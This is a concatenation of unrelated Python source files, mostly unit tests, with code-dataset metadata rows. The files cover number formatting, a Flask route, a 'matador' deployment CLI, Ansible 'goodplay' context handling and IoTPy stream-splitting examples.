    rows = [ ( 'n1' , 'n2' , 'n3' , 'n4' , 'n5' , 'n6' , 'n7' , 'n8' ) ]
    for i in range ( 1 , N ) :
        v  = float ( i ) / N
        v1 = VE ( v , 0.01 * v * v )
        v2 = VE ( v , 0.01 * v * v / 100 )
        v3 = VE ( v , 0.01 * v * v / 10000 )
        v4 = VE ( v , 0.01 * v * v / 1000000 )
        v5 = VE ( v , 0.01 * v * v / 100000000 )
        v6 = VE ( v , 0.01 * v * v / 10000000000 )
        v7 = VE ( math.inf , 0.01 * v * v / 10000000000 )
        v8 = VE ( v , math.nan )
        for e in [ -100 , -50 , -10 ] + [ g for g in range ( -5 , 6 ) ] + [ 10 , 50 , 100 ] :
            w1 = v1 * 10 ** e
            w2 = v2 * 10 ** e
            w3 = v3 * 10 ** e
            w4 = v4 * 10 ** e
            w5 = v5 * 10 ** e
            w6 = v6 * 10 ** e
            w7 = v7 * 10 ** e
            w8 = v8 * 10 ** e
            row = ( pdg_format ( w1.value () , w1.error () ) ,
                    pdg_format ( w2.value () , w2.error () ) ,
                    pdg_format ( w3.value () , w3.error () ) ,
                    pdg_format ( w4.value () , w4.error () ) ,
                    pdg_format ( w5.value () , w5.error () ) ,
                    pdg_format ( w6.value () , w6.error () ) ,
                    pdg_format ( w7.value () , w7.error () ) ,
                    pdg_format ( w8.value () , w8.error () ) )
            rows.append ( row )

    import ostap.logger.table as T
    logger.info ( 'PDG roundings:\n%s ' % T.table ( rows , prefix = '# ' , alignment = 'cccccccc' ) )
    logger.info ( 80 * '*' )
# =============================================================================
## The END
# =============================================================================
# testr.py (from Azizimj/GTSPbnd)
def cal_c():
    from scipy.stats import mvn
    import numpy as np

    low = np.array([0, 0])
    upp = np.array([1, 1])
    mu = np.array([.5, .5])
    S = np.array([[1, 0], [0, 1]])
    p, i = mvn.mvnun(low, upp, mu, S)
    print(p, i)

    low = np.array([0, 0])
    upp = np.array([1, 1])
    mu = np.array([.5, .5])
    S = np.array([[.1, 0], [0, 0.1]])
    p, i = mvn.mvnun(low, upp, mu, S)
    print(p, i)

    low = np.array([-.5, -.5])
    upp = np.array([.5, .5])
    mu = np.array([0, 0])
    S = np.array([[1, 0], [0, 1]])
    p, i = mvn.mvnun(low, upp, mu, S)
    print(p, i)

    return p

cal_c()
# tempCodeRunnerFile.py (from albertwdl/ML1DGAN)
'--batchSize','100'
# multilingual_t5/baseline_gu/__init__.py (from sumanthd17/mt5)
"""baseline_gu dataset."""

from .baseline_gu import BaselineGu
# routes/validate_upload.py (from eHattori/Flask-Model-Architecture)
from . import routes


@routes.route('/validateUpload/hello')
def hello():
    return 'Hello Validate Order'
# ip3country/__init__.py (from statsig-io/ip3country-py)
from .country_lookup import CountryLookup
581c16fd2ffaa69dc48d435ae4253765da89c296 | 7,929 | py | Python | tests/cli/test_commands.py | meatballs/python_utils | 7e7ab9856c6dee95bdede03ab1784bda179e3b1c | [
"MIT"
] | null | null | null | tests/cli/test_commands.py | meatballs/python_utils | 7e7ab9856c6dee95bdede03ab1784bda179e3b1c | [
"MIT"
] | null | null | null | tests/cli/test_commands.py | meatballs/python_utils | 7e7ab9856c6dee95bdede03ab1784bda179e3b1c | [
"MIT"
] | 1 | 2016-02-05T13:43:03.000Z | 2016-02-05T13:43:03.000Z | import os
from click.testing import CliRunner
import matador.cli.commands as cmd
import globals as gbl
from pathlib import Path
def test_init(tmpdir):
project_folder = Path(str(tmpdir), gbl.project)
os.chdir(tmpdir)
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['init', '-p', gbl.project])
    assert result.exit_code == 0
assert result.output == (
f'Created matador project {gbl.project}\n')
assert Path(project_folder, 'src').exists()
def test_create_ticket(project_repo):
test_ticket = 'test-ticket'
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['create-ticket', '--ticket', test_ticket])
assert result.exit_code == 0
assert result.output == f'Created ticket {test_ticket}\n'
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', test_ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
remove_file = Path(ticket_folder, 'remove.py')
assert ticket_folder.exists()
assert deploy_file.exists()
assert remove_file.exists()
last_commit = project_repo.get_object(project_repo.head())
commit_message = last_commit.message
expected_message = bytes(f'Create ticket {test_ticket}', encoding='UTF-8')
assert commit_message == expected_message
def test_create_package(project_repo):
test_package = 'test-package'
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['create-package', '--package', test_package])
assert result.exit_code == 0
assert result.output == f'Created package {test_package}\n'
package_folder = Path(
project_repo.path, 'deploy', 'packages', test_package)
package_file = Path(package_folder, 'tickets.yml')
remove_file = Path(package_folder, 'remove.py')
assert package_folder.exists()
assert package_file.exists()
assert remove_file.exists()
last_commit = project_repo.get_object(project_repo.head())
commit_message = last_commit.message
expected_message = bytes(
'Create package %s' % test_package, encoding='UTF-8')
assert commit_message == expected_message
def test_add_ticket_to_package(project_repo):
test_ticket = 'test-ticket'
test_package = 'test-package'
package_folder = Path(
project_repo.path, 'deploy', 'packages', test_package)
Path.mkdir(package_folder, parents=True)
tickets_file = Path(package_folder, 'tickets.yml')
tickets_file.touch()
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['add-t2p', '-t', test_ticket, '-p', test_package])
assert result.exit_code == 0
assert result.output == (
f'Added ticket {test_ticket} to package {test_package}\n')
with tickets_file.open('r') as f:
tickets = f.readlines()
assert f'- {test_ticket}\n' in tickets
def test_deploy_ticket(project_repo):
env = 'test'
test_ticket = 'test-ticket'
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', test_ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write('click.echo("Test Message")\n')
deploy_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(deploy_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test ticket')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'deploy-ticket', '-e', env, '-t', test_ticket, '-c', 'HEAD'])
assert result.exit_code == 0
assert result.output == (
f'Deploying ticket {test_ticket} to {env}\nTest Message\n')
def test_remove_ticket(project_repo):
env = 'test'
test_ticket = 'test-ticket'
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', test_ticket)
deploy_file = Path(ticket_folder, 'remove.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write('click.echo("Test Message")\n')
deploy_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(deploy_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test ticket')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'remove-ticket', '-e', env, '-t', test_ticket, '-c', 'HEAD'])
assert result.exit_code == 0
assert result.output == (
f'Removing ticket {test_ticket} from {env}\nTest Message\n')
def test_deploy_package(project_repo):
env = 'test'
package = 'test_package'
package_folder = Path(project_repo.path, 'deploy', 'packages', package)
package_file = Path(package_folder, 'tickets.yml')
package_folder.mkdir(parents=True)
package_file.touch()
for ticket in ('test-ticket-1', 'test-ticket-2'):
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write(f'click.echo("Test Message from {ticket}")\n')
with package_file.open('a') as f:
f.write(f'- {ticket}\n')
ticket_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(ticket_path, encoding='UTF-8')])
package_path = str(package_file.relative_to(project_repo.path))
project_repo.stage([bytes(package_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test package')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'deploy-package', '-e', env, '-p', package, '-c', 'HEAD'])
assert result.exit_code == 0
expected_output = (
f'Deploying package {package} to {env}\n'
'*************************\n'
f'Deploying ticket test-ticket-1 to {env}\n'
'Test Message from test-ticket-1\n\n'
'*************************\n'
f'Deploying ticket test-ticket-2 to {env}\n'
'Test Message from test-ticket-2\n\n'
)
assert result.output == expected_output
def test_remove_package(project_repo):
env = 'test'
package = 'test_package'
package_folder = Path(project_repo.path, 'deploy', 'packages', package)
package_file = Path(package_folder, 'tickets.yml')
package_folder.mkdir(parents=True)
package_file.touch()
for ticket in ('test-ticket-1', 'test-ticket-2'):
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write(f'click.echo("Test Message from {ticket}")\n')
with package_file.open('a') as f:
f.write(f'- {ticket}\n')
ticket_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(ticket_path, encoding='UTF-8')])
package_path = str(package_file.relative_to(project_repo.path))
project_repo.stage([bytes(package_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test package')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'remove-package', '-e', env, '-p', package, '-c', 'HEAD'])
assert result.exit_code == 0
expected_output = (
f'Removing package {package} from {env}\n'
'*************************\n'
f'Removing ticket test-ticket-1 from {env}\n'
'Test Message from test-ticket-1\n\n'
'*************************\n'
f'Removing ticket test-ticket-2 from {env}\n'
'Test Message from test-ticket-2\n\n'
)
assert result.output == expected_output
| 34.624454 | 78 | 0.649136 | 1,040 | 7,929 | 4.761538 | 0.0875 | 0.079968 | 0.045436 | 0.038166 | 0.830372 | 0.820477 | 0.787561 | 0.749192 | 0.731826 | 0.701939 | 0 | 0.00459 | 0.203178 | 7,929 | 228 | 79 | 34.776316 | 0.779202 | 0 | 0 | 0.697802 | 0 | 0 | 0.216042 | 0.013621 | 0 | 0 | 0 | 0 | 0.137363 | 1 | 0.043956 | false | 0 | 0.049451 | 0 | 0.093407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
58a67002b35d55f710d0a91fd40c12f31b6e05ac | 140 | py | Python | accounts/admin.py | ankitmlive/prolab-api | 8e86e222269b63108cd33f08a90b2d921a1152f6 | [
"MIT"
] | null | null | null | accounts/admin.py | ankitmlive/prolab-api | 8e86e222269b63108cd33f08a90b2d921a1152f6 | [
"MIT"
] | 5 | 2021-03-30T12:47:27.000Z | 2021-09-22T18:38:27.000Z | accounts/admin.py | ankitmlive/prolab-api | 8e86e222269b63108cd33f08a90b2d921a1152f6 | [
"MIT"
] | 1 | 2020-03-16T14:42:31.000Z | 2020-03-16T14:42:31.000Z | from django.contrib import admin
#from django.contrib.auth.admin import UserAdmin
from .models import ProUser
admin.site.register(ProUser)
| 23.333333 | 48 | 0.828571 | 20 | 140 | 5.8 | 0.55 | 0.172414 | 0.293103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 140 | 5 | 49 | 28 | 0.920635 | 0.335714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54982d848dc616af818bafe683b651a66447d349 | 94 | py | Python | algorithm/__init__.py | Opeyem1a/flight-path-optimizer | eb4285ed867f22163182789050131ec625889578 | [
"MIT"
] | null | null | null | algorithm/__init__.py | Opeyem1a/flight-path-optimizer | eb4285ed867f22163182789050131ec625889578 | [
"MIT"
] | null | null | null | algorithm/__init__.py | Opeyem1a/flight-path-optimizer | eb4285ed867f22163182789050131ec625889578 | [
"MIT"
] | null | null | null | from .flight_optimizer import FlightOptimizer
from .flight_noptimizer import FlightNoptimizer
| 31.333333 | 47 | 0.893617 | 10 | 94 | 8.2 | 0.7 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 94 | 2 | 48 | 47 | 0.953488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
49b4553dcd0af9a77863ad54273a65597047da9b | 37 | py | Python | pi_gpio_api/__init__.py | jcapona/pi-gpio-api | 26934ffb9d11d4ad226ee39df294f7606836261f | [
"MIT"
] | null | null | null | pi_gpio_api/__init__.py | jcapona/pi-gpio-api | 26934ffb9d11d4ad226ee39df294f7606836261f | [
"MIT"
] | null | null | null | pi_gpio_api/__init__.py | jcapona/pi-gpio-api | 26934ffb9d11d4ad226ee39df294f7606836261f | [
"MIT"
] | null | null | null | from pi_gpio_api.core.app import app
| 18.5 | 36 | 0.837838 | 8 | 37 | 3.625 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
49e2b409c13d9eab61e338b60a4af0a142de4b12 | 9,358 | py | Python | tests/test_context.py | goodplay/goodplay | dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca | [
"Apache-2.0"
] | 16 | 2016-03-16T12:20:49.000Z | 2020-04-17T15:31:54.000Z | tests/test_context.py | goodplay/goodplay | dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca | [
"Apache-2.0"
] | 290 | 2016-02-26T06:49:32.000Z | 2022-03-18T08:32:25.000Z | tests/test_context.py | goodplay/goodplay | dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca | [
"Apache-2.0"
] | 9 | 2016-01-20T20:55:44.000Z | 2020-11-04T03:51:03.000Z | # -*- coding: utf-8 -*-
from goodplay.ansible_support import Inventory, Playbook
from goodplay.context import GoodplayContext
# inventory_path
def test_inventory_path_file_found_in_playbook_path_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path == inventory_path
def test_inventory_path_dir_found_in_playbook_path_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure(dir=True)
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path == inventory_path
def test_inventory_path_is_none_when_not_in_playbook_path_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path is None
def test_inventory_path_is_none_when_inventory_path_in_parent_dir(tmpdir):
playbook_path = tmpdir.join('parent_dir', 'test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path is None
def test_inventory_path_is_none_when_inventory_path_in_sub_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('sub_dir', 'inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path is None
def test_inventory_path_is_cached(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.inventory_path
assert first_result is not None
assert id(ctx.inventory_path) == id(first_result)
# inventory
def test_inventory_is_none_when_inventory_path_is_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.inventory_path = None
assert ctx.inventory is None
def test_inventory_class(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory.__class__ == Inventory
def test_inventory_is_cached(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.inventory
assert first_result is not None
assert id(ctx.inventory) == id(first_result)
# playbook_dir_path
def test_playbook_dir_path_is_playbook_path_directory(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.playbook_dir_path == tmpdir
def test_playbook_dir_path_is_cached(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.playbook_dir_path
assert first_result is not None
assert id(ctx.playbook_dir_path) == id(first_result)
# playbook
def test_playbook_is_none_when_inventory_path_is_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.inventory_path = None
assert ctx.playbook is None
def test_playbook_class(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.write('''---
- hosts: host1
tasks:
- name: task 1
ping:
tags: test
''', ensure=True)
ctx = GoodplayContext(playbook_path)
assert ctx.playbook.__class__ == Playbook
def test_playbook_is_cached(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.write('''---
- hosts: host1
tasks:
- name: task 1
ping:
tags: test
''', ensure=True)
ctx = GoodplayContext(playbook_path)
first_result = ctx.playbook
assert first_result is not None
assert id(ctx.playbook) == id(first_result)
# role_path
def test_role_path_is_none_when_plain_test_playbook(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_tests_parent_dir_only(tmpdir):
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_meta_dir_beside_tests_parent_dir_only(tmpdir):
tmpdir.join('meta').ensure(dir=True)
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_meta_dir_with_main_yml_dir_beside_tests_parent_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure(dir=True)
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_meta_dir_with_main_yml_file_beside_playbook_path_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_when_meta_dir_with_main_yml_file_beside_tests_parent_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path == tmpdir
def test_role_path_when_meta_dir_with_main_yml_file_beside_tests_ancestor_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('tests', 'sub_dir1', 'sub_dir2', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path == tmpdir
def test_role_path_is_cached(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.role_path
assert first_result is not None
assert id(ctx.role_path) == id(first_result)
# is_role_playbook
def test_is_role_playbook_is_false_when_role_path_is_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.role_path = None
assert ctx.is_role_playbook is False
def test_is_role_playbook_is_true_when_role_path_is_not_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.role_path = tmpdir
assert ctx.is_role_playbook is True
# compose_project_name
def test_compose_project_name_is_same_for_playbook_path_and_environment(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.compose_project_name('env1') == ctx.compose_project_name('env1')
def test_compose_project_name_incorporates_node_id(tmpdir, monkeypatch):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
compose_project_name1 = ctx.compose_project_name('env1')
monkeypatch.setattr('uuid.getnode', lambda: 1234)
compose_project_name2 = ctx.compose_project_name('env1')
assert compose_project_name1 != compose_project_name2
def test_compose_project_name_incorporates_playbook_path(tmpdir):
playbook_path1 = tmpdir.join('dir1', 'test_playbook.yml')
playbook_path1.ensure()
playbook_path2 = tmpdir.join('dir2', 'test_playbook.yml')
playbook_path2.ensure()
ctx1 = GoodplayContext(playbook_path1)
ctx2 = GoodplayContext(playbook_path2)
assert ctx1.compose_project_name('env1') != ctx2.compose_project_name('env1')
def test_compose_project_name_incorporates_environment(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.compose_project_name('env1') != ctx.compose_project_name('env2')
# release
def test_release_removes_temp_dir_paths(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
temp_dir_path = ctx._create_temp_dir_path()
assert temp_dir_path.check(dir=True)
assert len(ctx._temp_dir_paths) == 1
ctx.release()
assert not temp_dir_path.check()
assert len(ctx._temp_dir_paths) == 0
| 25.708791 | 93 | 0.751229 | 1,249 | 9,358 | 5.247398 | 0.071257 | 0.166616 | 0.079036 | 0.105279 | 0.849252 | 0.803326 | 0.759536 | 0.749771 | 0.743668 | 0.743668 | 0 | 0.005165 | 0.151742 | 9,358 | 363 | 94 | 25.779614 | 0.820484 | 0.013785 | 0 | 0.639423 | 0 | 0 | 0.10218 | 0 | 0 | 0 | 0 | 0 | 0.177885 | 1 | 0.139423 | false | 0 | 0.009615 | 0 | 0.149038 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49fb5f45ee328b02a4c7a2dd3cd1ac7601f5e594 | 36 | py | Python | smart_home_hub/device/devices/roku/__init__.py | rsmith49/smart_home_hub | 36c8d07feecfb0166f0125585e109b1b357c4519 | [
"Apache-2.0"
] | null | null | null | smart_home_hub/device/devices/roku/__init__.py | rsmith49/smart_home_hub | 36c8d07feecfb0166f0125585e109b1b357c4519 | [
"Apache-2.0"
] | null | null | null | smart_home_hub/device/devices/roku/__init__.py | rsmith49/smart_home_hub | 36c8d07feecfb0166f0125585e109b1b357c4519 | [
"Apache-2.0"
] | null | null | null | from .roku_device import RokuDevice
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7047238047c54eb5c35b5180b9b365e14791bc1 | 41 | py | Python | src/.py/rgb/test.py | TED-996/krait-rgb | 44b60400bda2624265d3ec72a1a12a31e1bf036c | [
"MIT"
] | null | null | null | src/.py/rgb/test.py | TED-996/krait-rgb | 44b60400bda2624265d3ec72a1a12a31e1bf036c | [
"MIT"
] | null | null | null | src/.py/rgb/test.py | TED-996/krait-rgb | 44b60400bda2624265d3ec72a1a12a31e1bf036c | [
"MIT"
] | null | null | null | import cycle
import sys
print(sys.argv) | 8.2 | 15 | 0.780488 | 7 | 41 | 4.571429 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 41 | 5 | 15 | 8.2 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0.333333 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b73f6cc840cf79e1051922f68d09633f2afe6f79 | 25 | py | Python | manipulation_main/agents/__init__.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 75 | 2020-10-24T06:32:55.000Z | 2022-03-26T07:44:49.000Z | manipulation_main/agents/__init__.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 12 | 2021-03-21T06:19:00.000Z | 2022-03-31T13:39:34.000Z | manipulation_main/agents/__init__.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 27 | 2020-12-30T12:49:46.000Z | 2022-03-17T16:10:02.000Z |
from .agent import Agent | 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 2 | 24 | 12.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7619a9fca12d3248d6f23cab82e91353d3db008 | 14,535 | py | Python | examples/split/examples_split.py | sdeepaknarayanan/IoTPy | ba022c3d6696527b834a865b9cf403d90665145b | [
"BSD-3-Clause"
] | 3 | 2019-08-15T19:36:54.000Z | 2020-05-27T05:50:42.000Z | examples/split/examples_split.py | sdeepaknarayanan/IoTPy | ba022c3d6696527b834a865b9cf403d90665145b | [
"BSD-3-Clause"
] | 2 | 2020-05-29T19:34:39.000Z | 2020-06-12T19:42:05.000Z | examples/split/examples_split.py | sdeepaknarayanan/IoTPy | ba022c3d6696527b834a865b9cf403d90665145b | [
"BSD-3-Clause"
] | null | null | null | """
This module has examples of splitting a stream
into multiple streams.
"""
import sys
sys.path.append("../../IoTPy/helper_functions")
sys.path.append("../../IoTPy/core")
sys.path.append("../../IoTPy/agent_types")
# stream, helper_control are in IoTPy/IoTPy/core
from stream import Stream, run
from helper_control import _no_value, _multivalue
# recent_values is in IoTPy/IoTPy/helper_functions
from recent_values import recent_values
# split, basics are in IoTPy/IoTPy/agent_types
from split import split_element, split_window
from split import split_element_f, split_window_f
from basics import split_e, split_w, fsplit_2e, fsplit_2w
def examples():
#----------------------------------------------
# EXAMPLE: SIMPLE SPLIT
# Split a stream into a list of streams. In this
# example, a stream (s) is split into two streams:
# u and v.
# Decorate a conventional function to get a
# stream function. This function returns a list
# of two values corresponding to the two output
# streams.
@split_e
def h(x):
return [2*x, x+1000]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Create agents by calling the decorated function.
h(s, [u,v])
# Put data into input streams.
DATA = list(range(5))
s.extend(DATA)
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [2*x for x in DATA]
assert recent_values(v) == [x+1000 for x in DATA]
#----------------------------------------------
# EXAMPLE: SPLIT WITH KEYWORD ARGUMENT
# Split a stream into a list of streams. Use
# a keyword argument in the splitting function.
# Decorate a conventional function to get a
# stream function. This function returns a list
